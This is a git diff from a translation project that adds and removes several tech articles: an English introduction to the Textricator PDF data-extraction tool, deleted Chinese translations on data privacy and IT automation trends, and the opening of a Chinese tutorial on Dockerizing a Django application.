And, that’s all for now, folks. Hope this was useful. More good stuffs to come. Stay tuned!
|
||||||
|
|
||||||
|
Cheers!
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.ostechnix.com/how-to-mount-google-drive-locally-as-virtual-file-system-in-linux/
|
||||||
|
|
||||||
|
作者:[SK][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://www.ostechnix.com/author/sk/
|
||||||
|
[1]:https://www.google.com/drive/
|
||||||
|
[2]:https://aur.archlinux.org/packages/google-drive-ocamlfuse/
|
||||||
|
[3]:https://www.ostechnix.com/yay-found-yet-another-reliable-aur-helper/
|
||||||
|
[4]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
|
||||||
|
[5]:http://www.ostechnix.com/wp-content/uploads/2018/07/google-drive.png
|
||||||
|
[6]:http://www.ostechnix.com/wp-content/uploads/2018/07/google-drive-2.png
|
||||||
|
[7]:https://github.com/astrada/google-drive-ocamlfuse/wiki/Configuration
|
||||||
|
[8]:https://github.com/astrada/google-drive-ocamlfuse
|
||||||
|
[9]:https://www.reddit.com/r/DataHoarder/comments/8vlb2v/google_drive_as_a_file_system/e1oh9q9/
|
||||||
|
[10]:https://aur.archlinux.org/packages/gcsf-git/
|
||||||
|
[11]:http://www.ostechnix.com/wp-content/uploads/2018/07/google-drive-3.png
|
||||||
|
[12]:http://www.ostechnix.com/wp-content/uploads/2018/07/google-drive-4.png
|
||||||
|
[13]:https://github.com/harababurel/gcsf
|
@ -0,0 +1,42 @@
|
|||||||
|
translating---geelkpi
|
||||||
|
|
||||||
|
Textricator: Data extraction made simple
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/document_free_access_cut_security.png?itok=ocvCv8G2)
|
||||||
|
|
||||||
|
You probably know the feeling: You ask for data and get a positive response, only to open the email and find a whole bunch of PDFs attached. Data, interrupted.
|
||||||
|
|
||||||
|
We understand your frustration, and we’ve done something about it: Introducing [Textricator][1], our first open source product.
|
||||||
|
|
||||||
|
We’re Measures for Justice, a criminal justice research and transparency organization. Our mission is to provide data transparency for the entire justice system, from arrest to post-conviction. We do this by producing a series of up to 32 performance measures covering the entire criminal justice system, county by county. We get our data in many ways—all legal, of course—and while many state and county agencies are data-savvy, giving us quality, formatted data in CSVs, the data is often bundled inside software with no simple way to get it out. PDF reports are the best they can offer.
|
||||||
|
|
||||||
|
Developers Joe Hale and Stephen Byrne have spent the past two years developing Textricator to extract tens of thousands of pages of data for our internal use. Textricator can process just about any text-based PDF format—not just tables, but complex reports with wrapping text and detail sections generated from tools like Crystal Reports. Simply tell Textricator the attributes of the fields you want to collect, and it chomps through the document, collecting and writing out your records.
|
||||||
|
|
||||||
|
Not a software engineer? Textricator doesn’t require programming skills; rather, the user describes the structure of the PDF and Textricator handles the rest. Most users run it via the command line; however, a browser-based GUI is available.
|
||||||
|
|
||||||
|
We evaluated other great open source solutions like [Tabula][2], but they just couldn’t handle the structure of some of the PDFs we needed to scrape. “Textricator is both flexible and powerful and has cut the time we spend to process large datasets from days to hours,” says Andrew Branch, director of technology.
|
||||||
|
|
||||||
|
At MFJ, we’re committed to transparency and knowledge-sharing, which includes making our software available to anyone, especially those trying to free and share data publicly. Textricator is available on [GitHub][3] and released under [GNU Affero General Public License Version 3][4].
|
||||||
|
|
||||||
|
You can see the results of our work, including data processed via Textricator, on our free [online data portal][5]. Textricator is an essential part of our process and we hope civic tech and government organizations alike can unlock more data with this new tool.
|
||||||
|
|
||||||
|
If you use Textricator, let us know how it helped solve your data problem. Want to improve it? Submit a pull request.
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/7/textricator
|
||||||
|
|
||||||
|
作者:[Stephen Byrne][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:
|
||||||
|
[1]:https://textricator.mfj.io/
|
||||||
|
[2]:https://tabula.technology/
|
||||||
|
[3]:https://github.com/measuresforjustice/textricator
|
||||||
|
[4]:https://www.gnu.org/licenses/agpl-3.0.en.html
|
||||||
|
[5]:https://www.measuresforjustice.org/portal/
|
@ -1,95 +0,0 @@
|
|||||||
对数据隐私持开放的态度
|
|
||||||
======
|
|
||||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/GOV_opendata.png?itok=M8L2HGVx)
|
|
||||||
|
|
||||||
|
|
||||||
Image by : opensource.com
|
|
||||||
|
|
||||||
今天是[数据隐私日][1],(在欧洲叫"数据保护日"),你可能会认为现在我们处于一个开源的世界中,所有的数据都应该免费,[就像人们想的那样][2],但是现实并没那么简单。主要有两个原因:
|
|
||||||
1. 我们中的大多数(不仅仅是在开源中)认为至少有些关于我们自己的数据是不愿意分享出去的(我在之前发表的一篇文章中列举了一些列子[3])
|
|
||||||
2. 我们很多人虽然在开源中工作,但事实上是为了一些商业公司或者其他一些组织工作,也是在合法的要求范围内分享数据。
|
|
||||||
|
|
||||||
所以实际上,数据隐私对于每个人来说是很重要的。
|
|
||||||
|
|
||||||
事实证明,在美国和欧洲之间,人们和政府认为让组织使用的数据的起点是有些不同的。前者通常为实体提供更多的自由度,更愤世嫉俗的是--大型的商业体利用他们收集到的关于我们的数据。在欧洲,完全是另一观念,一直以来持有的多是有更多约束限制的观念,而且在5月25日,欧洲的观点可以说取得了胜利。
|
|
||||||
|
|
||||||
## 通用数据保护条例的影响
|
|
||||||
|
|
||||||
那是一个相当全面的声明,其实事实上就是欧盟在2016年通过的一项关于通用数据保护的立法,使它变得可实施。数据通用保护条例在私人数据怎样才能被保存,如何才能被使用,谁能使用,能被持有多长时间这些方面设置了严格的规则。它描述了什么数据属于私人数据--而且涉及的条目范围非常广泛,从你的姓名家庭住址到你的医疗记录以及接通你电脑的IP地址。
|
|
||||||
|
|
||||||
通用数据保护条例的重要之处是他并不仅仅适用于欧洲的公司,如果你是阿根廷人,日本人,美国人或者是俄罗斯的公司而且你正在收集涉及到欧盟居民的数据,你就要受到这个条例的约束管辖。
|
|
||||||
|
|
||||||
“哼!” 你可能会这样说,“我的业务不在欧洲:他们能对我有啥约束?” 答案很简答:如果你想继续在欧盟做任何生意,你最好遵守,因为一旦你违反了通用数据保护条例的规则,你将会受到你全球总收入百分之四的惩罚。是的,你没听错,是全球总收入不是仅仅在欧盟某一国家的的收入,也不只是净利润,而是全球总收入。这将会让你去叮嘱告知你的法律团队,他们就会知会你的整个团队,同时也会立即去指引你的IT团队,确保你的行为相当短的时间内是符合要求的。
|
|
||||||
|
|
||||||
看上去这和欧盟之外的城市没有什么相关性,但其实不然,对大多数公司来说,对所有的他们的顾客、合作伙伴以及员工实行同样的数据保护措施是件既简单又有效的事情,而不是只是在欧盟的城市实施,这将会是一件很有利的事情。2
|
|
||||||
|
|
||||||
然而,数据通用保护条例不久将在全球实施并不意味着一切都会变的很美好:事实并非如此,我们一直在丢弃关于我们自己的信息--而且允许公司去使用它。
|
|
||||||
|
|
||||||
有一句话是这么说的(尽管很争议):“如果你没有在付费,那么你就是产品。”这句话的意思就是如果你没有为某一项服务付费,那么其他的人就在付费使用你的数据。
|
|
||||||
你有付费使用Facebook、推特?谷歌邮箱?你觉得他们是如何赚钱的?大部分是通过广告,一些人会争论那是他们向你提供的一项服务而已,但事实上是他们在利用你的数据从广告商里获取收益。你不是一个真正的广告的顾客-只有当你从看了广告后买了他们的商品之后你才变成了他们的顾客,但直到这个发生之前,都是广告平台和广告商的关系。
|
|
||||||
|
|
||||||
有些服务是允许你通过付费来消除广告的(流媒体音乐平台声破天就是这样的),但从另一方面来讲,即使你认为付费的服务也可以启用广告(列如,亚马逊正在允许通过Alexa广告)除非我们想要开始为这些所有的免费服务付费,我们需要清除我们所放弃的,而且在我们想要揭发和不想的里面做一些选择。
|
|
||||||
|
|
||||||
### 谁是顾客?
|
|
||||||
|
|
||||||
关于数据的另一个问题一直在困扰着我们,它是产生的数据量的直接结果。有许多组织一直在产生巨量的数据,包括公共的组织比如大学、医院或者是政府部门4--
|
|
||||||
而且他们没有能力去储存这些数据。如果这些数据没有长久的价值也就没什么要紧的,但事实正好相反,随着处理大数据的工具正在开发中,而且这些组织也认识到他们现在以及在不久的将来将能够去开采这些数据。
|
|
||||||
|
|
||||||
然而他们面临的是,随着数据的增长和存储量的不足他们是如何处理的。幸运--而且我是带有讽刺意味的使用了这个词,5大公司正在介入去帮助他们。“把你们的数据给我们,”他们说,“我们将免费保存。我们甚至让你随时能够使用你所收集到的数据!”这听起来很棒,是吗?这是大公司的一个极具代表性的列子,站在慈善的立场上帮助公共组织管理他们收集到的关于我们的数据。
|
|
||||||
|
|
||||||
不幸的是,慈善不是唯一的理由。他们是附有条件的:作为同意保存数据的交换条件,这些公司得到了将数据访问权限出售非第三方的权利。你认为公共组织,或者是被收集数据的人在数据被出售使用权使给第三方在他们如何使用上面能有发言权吗?我将把这个问题当做一个练习留给读者去思考。7
|
|
||||||
|
|
||||||
### 开放和积极
|
|
||||||
|
|
||||||
然而并不只有坏消息。政府中有一项在逐渐发展起来的“开放数据”运动鼓励部门能够将免费开放他们的数据给公众或者其他组织。这项行动目前正在被实施立法。许多
|
|
||||||
支援组织--尤其是那些收到公共基金的--正在开始推动同样的活动。即使商业组织也有些许的兴趣。而且,在技术上已经可行了,例如围绕不同的隐私和多方计算上,正在允许我们根据数据设置和不揭露太多关于个人的前提下开采数据--一个历史性的计算问题比你想象的要容易处理的多。
|
|
||||||
|
|
||||||
这些对我们来说意味着什么呢?我之前在网站Opensource.com上写过关于[开源的共享福利][4],而且我越来越相信我们需要把我们的视野从软件拓展到其他区域:硬件,组织,和这次讨论有关的,数据。让我们假设一下你是A公司要提向另一家公司提供一项服务,客户B。在游戏中有四种不同类型的数据:
|
|
||||||
1. 数据完全开放:对A和B都是可得到的,世界上任何人都可以得到
|
|
||||||
2. 数据是已知的,共享的,和机密的:A和B可得到,但其他人不能得到。
|
|
||||||
3. 数据是公司级别上保密的:A公司可以得到,但B顾客不能
|
|
||||||
4. 数据是顾客级别保密的:B顾客可以得到,但A公司不能
|
|
||||||
|
|
||||||
首先,也许我们对数据应该更开放些,将数据默认放到选项一中。如果那些数据对所有人开放--在无人驾驶、语音识别,矿藏以及人口数据统计会有相当大的作用的,9
|
|
||||||
如果我们能够找到方法将数据放到选项2,3和4中,不是很好嘛--或者至少它们中的一些--在选项一中是可以实现的,同时仍将细节保密?这就是研究这些新技术的希望。
|
|
||||||
然而又很长的路要走,所以不要太兴奋,同时,开始考虑将你的的一些数据默认开放。
|
|
||||||
|
|
||||||
### 一些具体的措施
|
|
||||||
|
|
||||||
我们如何处理数据的隐私和开放?下面是我想到的一些具体的措施:欢迎大家评论做出更多的贡献。
|
|
||||||
* 检查你的组织是否正在认真严格的执行通用数据保护条例。如果没有,去推动实施它。
|
|
||||||
* 要默认去加密敏感数据(或者适当的时候用散列算法),当不再需要的时候及时删掉--除非数据正在被处理使用否则没有任何借口让数据清晰可见。
|
|
||||||
* 当你注册一个服务的时候考虑一下你公开了什么信息,特别是社交媒体类的。
|
|
||||||
* 和你的非技术朋友讨论这个话题。
|
|
||||||
* 教育你的孩子,你朋友的孩子以及他们的朋友。然而最好是去他们的学校和他们的老师交谈在他们的学校中展示。
|
|
||||||
* 鼓励你工作志愿服务的组织,或者和他们互动推动数据的默认开放。不是去思考为什么我要使数据开放而是以我为什么不让数据开放开始。
|
|
||||||
* 尝试去访问一些开源数据。开采使用它。开发应用来使用它,进行数据分析,画漂亮的图,10 制作有趣的音乐,考虑使用它来做些事。告诉组织去使用它们,感谢它们,而且鼓励他们去做更多。
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
1. 我承认你可能尽管不会
|
|
||||||
2. 假设你坚信你的个人数据应该被保护。
|
|
||||||
3. 如果你在思考“极好的”的寓意,在这点上你并不孤独。
|
|
||||||
4. 事实上这些机构能够有多开放取决于你所居住的地方。
|
|
||||||
5. 假设我是英国人,那是非常非常大的剂量。
|
|
||||||
6. 他们可能是巨大的公司:没有其他人能够负担得起这么大的存储和基础架构来使数据保持可用。
|
|
||||||
7. 不,答案是“不”。
|
|
||||||
8. 尽管这个列子也同样适用于个人。看看:A可能是Alice,B 可能是BOb...
|
|
||||||
9. 并不是说我们应该暴露个人的数据或者是这样的数据应该被保密,当然--不是那类的数据。
|
|
||||||
10. 我的一个朋友当她接孩子放学的时候总是下雨,所以为了避免确认失误,她在整个学年都访问天气信息并制作了图表分享到社交媒体上。
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://opensource.com/article/18/1/being-open-about-data-privacy
|
|
||||||
|
|
||||||
作者:[Mike Bursell][a]
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者FelixYFZ](https://github.com/FelixYFZ)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://opensource.com/users/mikecamel
|
|
||||||
[1]:https://en.wikipedia.org/wiki/Data_Privacy_Day
|
|
||||||
[2]:https://en.wikipedia.org/wiki/Information_wants_to_be_free
|
|
||||||
[3]:https://aliceevebob.wordpress.com/2017/06/06/helping-our-governments-differently/
|
|
||||||
[4]:https://opensource.com/article/17/11/commonwealth-open-source
|
|
||||||
[5]:http://www.outpost9.com/reference/jargon/jargon_40.html#TAG2036
|
|
@ -1,130 +0,0 @@
|
|||||||
IT自动化的下一步是什么: 6 大趋势
|
|
||||||
======
|
|
||||||
|
|
||||||
![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/cio_ai_artificial_intelligence.png?itok=o0csm9l2)
|
|
||||||
|
|
||||||
我们最近介绍了 [促进自动化的因素][1] ,目前正在被人们采用的 [趋势][2], 以及那些刚开始使用自动化部分流程组织 [有用的技巧][3] 。
|
|
||||||
|
|
||||||
噢, 我们也分享了在你的公司[如何使用自动化的案例][4] , 以及 [长期成功的关键][5].
|
|
||||||
|
|
||||||
现在, 只有一个问题: 自动化的下一步是什么? 我们邀请一系列专家分享一下 [自动化][6]不远的将来。 以下是他们建议IT领域领导需密切关注的六大趋势。
|
|
||||||
|
|
||||||
### 1. 机器学习的成熟
|
|
||||||
|
|
||||||
对于关于 [机器学习][7]的讨论 (与“自我学习系统”相似的定义),对于绝大多数组织的项目来说,实际执行起来它仍然为时过早。但预计这将发生变化,机器学习将在下一次IT自动化浪潮中将扮演着至关重要的角色。
|
|
||||||
|
|
||||||
[Advanced Systems Concepts, Inc.][8]公司工程总监 Mehul Amin 指出机器学习是IT自动化下一个关键增长领域之一。
|
|
||||||
|
|
||||||
“随着数据化的发展, 自动化软件理应可以自我决策,否则这就是开发人员的责任了”, Amin 说。 “例如, 开发者需要执行构建内容, 但是识别系统最佳执行流程的,可能是由系统内软件分析完成。”
|
|
||||||
|
|
||||||
假设将这个系统延伸到其他地方中。Amin 指出,机器学习可以使自动化系统在必要的时候提供额外的资源,以需要满足时间线或SLA,同样在不需要资源的时候退出以及其他的可能性。
|
|
||||||
|
|
||||||
显然不只有 Amin 一个人这样认为。
|
|
||||||
|
|
||||||
[Sungard Availability Services][9] 公司首席架构师 Kiran Chitturi 表示,“IT自动化正在走向自我学习的方向” 。“系统将会能测试和监控自己,加强业务流程和软件交付能力。”
|
|
||||||
|
|
||||||
Chitturi 指出自动化测试就是个例子。脚本测试已经被广泛采用,但很快这些自动化测试流程将会更容易学习,更快发展,例如开发出新的代码或将更为广泛地影响生产环境。
|
|
||||||
|
|
||||||
### 2. 人工智能催生的自动化
|
|
||||||
|
|
||||||
上述原则同样适合 [人工智能][10](但是为独立)的领域。假定新兴的人工智能技术将也会产生新的自动化机会。根据对人工智能的定义,机器学习在短时间内可能会对IT领域产生巨大的影响(并且我们可能会看到这两个领域的许多重叠的定义和理解)。
|
|
||||||
|
|
||||||
[SolarWinds][11]公司技术负责人 Patrick Hubbard说,“人工智能(AI)和机器学习的整合普遍被认为对未来几年的商业成功起至关重要的作用。”
|
|
||||||
|
|
||||||
### 3. 这并不意味着不再需要人力
|
|
||||||
|
|
||||||
让我们试着安慰一下那些不知所措的人:前两种趋势并不一定意味着我们将失去工作。
|
|
||||||
|
|
||||||
这很可能意味着各种角色的改变以及[全新角色][12]的创造。
|
|
||||||
|
|
||||||
但是在可预见的将来,至少,你不必需要机器人鞠躬。
|
|
||||||
|
|
||||||
“一台机器只能运行在给定的环境变量中它不能选择包含新的变量,在今天只有人类可以这样做,” Hubbard 解释说。“但是,对于IT专业人员来说,这将是需要培养AI和自动化技能的时代。如对程序设计、编程、管理人工智能和机器学习功能算法的基本理解,以及用强大的安全状态面对更复杂的网络攻击。”
|
|
||||||
|
|
||||||
Hubbard 分享一些新的工具或功能例子,例如支持人工智能的安全软件或机器学习的应用程序,这些应用程序可以远程发现石油管道中的维护需求。两者都可以提高效益和效果,自然不会代替需要信息安全或管道维护的人员。
|
|
||||||
|
|
||||||
“许多新功能仍需要人工监控,”Hubbard 说。“例如,为了让机器确定一些‘预测’是否可能成为‘规律’,人为的管理是必要的。”
|
|
||||||
|
|
||||||
即使你把机器学习和AI先放在一边,看待一般地IT自动化,同样原理也是成立的,尤其是在软件开发生命周期中。
|
|
||||||
|
|
||||||
[Juniper Networks][13]公司自动化首席架构师 Matthew Oswalt ,指出IT自动化增长的根本原因是它通过减少操作基础设施所需的人工工作量来创造直接价值。
|
|
||||||
|
|
||||||
在代码上,操作工程师可以使用事件驱动的自动化提前定义他们的工作流程,而不是在凌晨3点来应对基础设施的问题。
|
|
||||||
|
|
||||||
“它也将操作工作流程作为代码而不再是容易过时的文档或系统知识阶段,”Oswalt解释说。“操作人员仍然需要在[自动化]工具响应事件方面后发挥积极作用。采用自动化的下一个阶段是建立一个能够跨IT频谱识别发生的有趣事件的系统,并以自主方式进行响应。在代码上,操作工程师可以使用事件驱动的自动化提前定义他们的工作流程,而不是在凌晨3点来应对基础设施的问题。他们可以依靠这个系统在任何时候以同样的方式作出回应。”
|
|
||||||
|
|
||||||
### 4. 对自动化的焦虑将会减少
|
|
||||||
|
|
||||||
SolarWinds公司的 Hubbard 指出,“自动化”一词本身就产生大量的不确定性和担忧,不仅仅是在IT领域,而且是跨专业领域,他说这种担忧是合理的。但一些随之而来的担忧可能被夸大了,甚至是科技产业本身。现实可能实际上是这方面的镇静力:当自动化的实际实施和实践帮助人们认识到这个列表中的“3”时,我们将看到“4”的出现。
|
|
||||||
|
|
||||||
“今年我们可能会看到对自动化焦虑的减少,更多的组织开始接受人工智能和机器学习作为增加现有人力资源的一种方式,”Hubbard说。“自动化历史上的今天为更多的工作创造了空间,通过降低成本和时间来完成较小任务,并将劳动力重新集中到无法自动化并需要人力的事情上。人工智能和机器学习也是如此。”
|
|
||||||
|
|
||||||
自动化还将减少IT领导者神经紧张主题的一些焦虑:安全。正如[红帽][14]公司首席架构师 Matt Smith 最近[指出][15]的那样,自动化将越来越多地帮助IT部门降低与维护任务相关的安全风险。
|
|
||||||
|
|
||||||
他的建议是:“首先在维护活动期间记录和自动化IT资产之间的交互。通过依靠自动化,您不仅可以消除历史上需要大量手动操作和手术技巧的任务,还可以降低人为错误的风险,并展示当您的IT组织采纳变更和新工作方法时可能发生的情况。最终,这将迅速减少对应用安全补丁的抵制。而且它还可以帮助您的企业在下一次重大安全事件中摆脱头条新闻。”
|
|
||||||
|
|
||||||
**[ 阅读全文: [12个企业安全坏习惯要打破。][16] ] **
|
|
||||||
|
|
||||||
### 5. 脚本和自动化工具将持续发展
|
|
||||||
|
|
||||||
看到许多组织增加自动化的第一步 - 通常以脚本或自动化工具(有时称为配置管理工具)的形式 - 作为“早期”工作。
|
|
||||||
|
|
||||||
但是随着各种自动化技术的使用,对这些工具的观点也在不断发展。
|
|
||||||
|
|
||||||
[DataVision][18]首席运营官 Mark Abolafia 表示:“数据中心环境中存在很多重复性过程,容易出现人为错误,[Ansible][17]等技术有助于缓解这些问题。“通过 Ansible ,人们可以为一组操作编写特定的步骤,并输入不同的变量,例如地址等,使过去长时间的过程链实现自动化,而这些过程以前都需要人为触摸和更长的交货时间。”
|
|
||||||
|
|
||||||
**[想了解更多关于Ansible这个方面的知识吗?阅读相关文章:[使用Ansible时的成功秘诀][19]。 ]**
|
|
||||||
|
|
||||||
另一个因素是:工具本身将继续变得更先进。
|
|
||||||
|
|
||||||
“使用先进的IT自动化工具,开发人员将能够在更短的时间内构建和自动化工作流程,减少易出错的编码,” ASCI 公司的 Amin 说。“这些工具包括预先构建的,预先测试过的拖放式集成,API作业,丰富的变量使用,参考功能和对象修订历史记录。”
|
|
||||||
|
|
||||||
### 6. 自动化开创了新的指标机会
|
|
||||||
|
|
||||||
正如我们在此前所说的那样,IT自动化不是万能的。它不会修复被破坏的流程,或者以其他方式为您的组织提供全面的灵丹妙药。这也是持续不断的:自动化并不排除衡量性能的必要性。
|
|
||||||
|
|
||||||
**[ 参见我们的相关文章 [DevOps指标:你在衡量什么重要吗?][20] ]**
|
|
||||||
|
|
||||||
实际上,自动化应该打开新的机会。
|
|
||||||
|
|
||||||
[Janeiro Digital][21]公司架构师总裁 Josh Collins 说,“随着越来越多的开发活动 - 源代码管理,DevOps管道,工作项目跟踪 - 转向API驱动的平台 - 将这些原始数据拼接在一起以描绘组织效率提升的机会和图景”。
|
|
||||||
|
|
||||||
Collins 认为这是一种可能的新型“开发组织度量指标”。但不要误认为这意味着机器和算法可以突然预测IT所做的一切。
|
|
||||||
|
|
||||||
“无论是衡量个人资源还是整体团队,这些指标都可以很强大 - 但应该用大量的背景来衡量。”Collins说,“将这些数据用于高层次趋势并确认定性观察 - 而不是临床评级你的团队。”
|
|
||||||
|
|
||||||
**想要更多这样知识, IT领导者?[注册我们的每周电子邮件通讯][22]。**
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://enterprisersproject.com/article/2018/3/what-s-next-it-automation-6-trends-watch
|
|
||||||
|
|
||||||
作者:[Kevin Casey][a]
|
|
||||||
译者:[MZqk](https://github.com/MZqk)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://enterprisersproject.com/user/kevin-casey
|
|
||||||
[1]:https://enterprisersproject.com/article/2017/12/5-factors-fueling-automation-it-now
|
|
||||||
[2]:https://enterprisersproject.com/article/2017/12/4-trends-watch-it-automation-expands
|
|
||||||
[3]:https://enterprisersproject.com/article/2018/1/getting-started-automation-6-tips
|
|
||||||
[4]:https://enterprisersproject.com/article/2018/1/how-make-case-it-automation
|
|
||||||
[5]:https://enterprisersproject.com/article/2018/1/it-automation-best-practices-7-keys-long-term-success
|
|
||||||
[6]:https://enterprisersproject.com/tags/automation
|
|
||||||
[7]:https://enterprisersproject.com/article/2018/2/how-spot-machine-learning-opportunity
|
|
||||||
[8]:https://www.advsyscon.com/en-us/
|
|
||||||
[9]:https://www.sungardas.com/en/
|
|
||||||
[10]:https://enterprisersproject.com/tags/artificial-intelligence
|
|
||||||
[11]:https://www.solarwinds.com/
|
|
||||||
[12]:https://enterprisersproject.com/article/2017/12/8-emerging-ai-jobs-it-pros
|
|
||||||
[13]:https://www.juniper.net/
|
|
||||||
[14]:https://www.redhat.com/en?intcmp=701f2000000tjyaAAA
|
|
||||||
[15]:https://enterprisersproject.com/article/2018/2/12-bad-enterprise-security-habits-break
|
|
||||||
[16]:https://enterprisersproject.com/article/2018/2/12-bad-enterprise-security-habits-break?sc_cid=70160000000h0aXAAQ
|
|
||||||
[17]:https://opensource.com/tags/ansible
|
|
||||||
[18]:https://datavision.com/
|
|
||||||
[19]:https://opensource.com/article/18/2/tips-success-when-getting-started-ansible?intcmp=701f2000000tjyaAAA
|
|
||||||
[20]:https://enterprisersproject.com/article/2017/7/devops-metrics-are-you-measuring-what-matters?sc_cid=70160000000h0aXAAQ
|
|
||||||
[21]:https://www.janeirodigital.com/
|
|
||||||
[22]:https://enterprisersproject.com/email-newsletter?intcmp=701f2000000tsjPAAQ
|
|
@ -0,0 +1,415 @@
|
|||||||
|
Docker 指南:Docker 化 Python Django 应用程序
|
||||||
|
======
|
||||||
|
|
||||||
|
### 目录
|
||||||
|
|
||||||
|
1. [我们要做什么?][6]
|
||||||
|
|
||||||
|
2. [步骤 1 - 安装 Docker-ce][7]
|
||||||
|
|
||||||
|
3. [步骤 2 - 安装 Docker-compose][8]
|
||||||
|
|
||||||
|
4. [步骤 3 - 配置项目环境][9]
|
||||||
|
1. [创建一个新的 requirements.txt 文件][1]
|
||||||
|
|
||||||
|
2. [创建 Nginx 虚拟主机文件 django.conf][2]
|
||||||
|
|
||||||
|
3. [创建 Dockerfile][3]
|
||||||
|
|
||||||
|
4. [创建 Docker-compose 脚本][4]
|
||||||
|
|
||||||
|
5. [配置 Django 项目][5]
|
||||||
|
|
||||||
|
5. [步骤 4 - 构建并运行 Docker 镜像][10]
|
||||||
|
|
||||||
|
6. [步骤 5 - 测试][11]
|
||||||
|
|
||||||
|
7. [参考][12]
|
||||||
|
|
||||||
|
|
||||||
|
Docker 是一个开源项目,为开发人员和系统管理员提供了一个开放平台,作为一个轻量级容器,它可以在任何地方构建,打包和运行应用程序。Docker 在软件容器中自动部署应用程序。
|
||||||
|
|
||||||
|
Django 是一个用 Python 编写的 Web 应用程序框架,遵循 MVC(模型-视图-控制器)架构。它是免费的,并在开源许可下发布。它速度很快,旨在帮助开发人员尽快将他们的应用程序上线。
|
||||||
|
|
||||||
|
在本教程中,我将逐步向你展示在 Ubuntu 16.04 如何为现有的 Django 应用程序创建 docker 镜像。我们将学习如何 docker 化一个 Python Django 应用程序,然后使用一个 docker-compose 脚本将应用程序作为容器部署到 docker 环境。
|
||||||
|
|
||||||
|
为了部署我们的 Python Django 应用程序,我们需要其他 docker 镜像:一个用于 Web 服务器的 nginx docker 镜像和用于数据库的 PostgreSQL 镜像。
|
||||||
|
|
||||||
|
### 我们要做什么?
|
||||||
|
|
||||||
|
1. 安装 Docker-ce
|
||||||
|
|
||||||
|
2. 安装 Docker-compose
|
||||||
|
|
||||||
|
3. 配置项目环境
|
||||||
|
|
||||||
|
4. 构建并运行
|
||||||
|
|
||||||
|
5. 测试
|
||||||
|
|
||||||
|
### 步骤 1 - 安装 Docker-ce
|
||||||
|
|
||||||
|
在本教程中,我们将重 docker 仓库安装 docker-ce 社区版。我们将安装 docker-ce 社区版和 docker-compose,其支持 compose 文件版本 3(to 校正者:此处不太明白具体意思)。
|
||||||
|
|
||||||
|
在安装 docker-ce 之前,先使用 apt 命令安装所需的 docker 依赖项。
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo apt install -y \
|
||||||
|
apt-transport-https \
|
||||||
|
ca-certificates \
|
||||||
|
curl \
|
||||||
|
software-properties-common
|
||||||
|
```
|
||||||
|
|
||||||
|
现在通过运行以下命令添加 docker 密钥和仓库。
|
||||||
|
|
||||||
|
```
|
||||||
|
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
|
||||||
|
sudo add-apt-repository \
|
||||||
|
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
|
||||||
|
$(lsb_release -cs) \
|
||||||
|
stable"
|
||||||
|
```
|
||||||
|
|
||||||
|
[![安装 Docker-ce](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/1.png)][14]
|
||||||
|
|
||||||
|
更新仓库并安装 docker-ce。
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo apt update
|
||||||
|
sudo apt install -y docker-ce
|
||||||
|
```
|
||||||
|
|
||||||
|
安装完成后,启动 docker 服务并使其能够在每次系统引导时启动。
|
||||||
|
|
||||||
|
```
|
||||||
|
systemctl start docker
|
||||||
|
systemctl enable docker
|
||||||
|
```
|
||||||
|
|
||||||
|
接着,我们将添加一个名为 'omar' 的新用户并将其添加到 docker 组。
|
||||||
|
|
||||||
|
```
|
||||||
|
useradd -m -s /bin/bash omar
|
||||||
|
usermod -a -G docker omar
|
||||||
|
```
|
||||||
|
|
||||||
|
[![启动 Docker](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/2.png)][15]
|
||||||
|
|
||||||
|
以 omar 用户身份登录并运行 docker 命令,如下所示。
|
||||||
|
|
||||||
|
```
|
||||||
|
su - omar
|
||||||
|
docker run hello-world
|
||||||
|
```
|
||||||
|
|
||||||
|
确保你能从 Docker 获得 hello-world 消息。
|
||||||
|
|
||||||
|
[![检查 Docker 安装](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/3.png)][16]
|
||||||
|
|
||||||
|
Docker-ce 安装已经完成。
|
||||||
|
|
||||||
|
### 步骤 2 - 安装 Docker-compose
|
||||||
|
|
||||||
|
在本教程中,我们将使用最新的 docker-compose 支持 compose 文件版本 3。我们将手动安装 docker-compose。
|
||||||
|
|
||||||
|
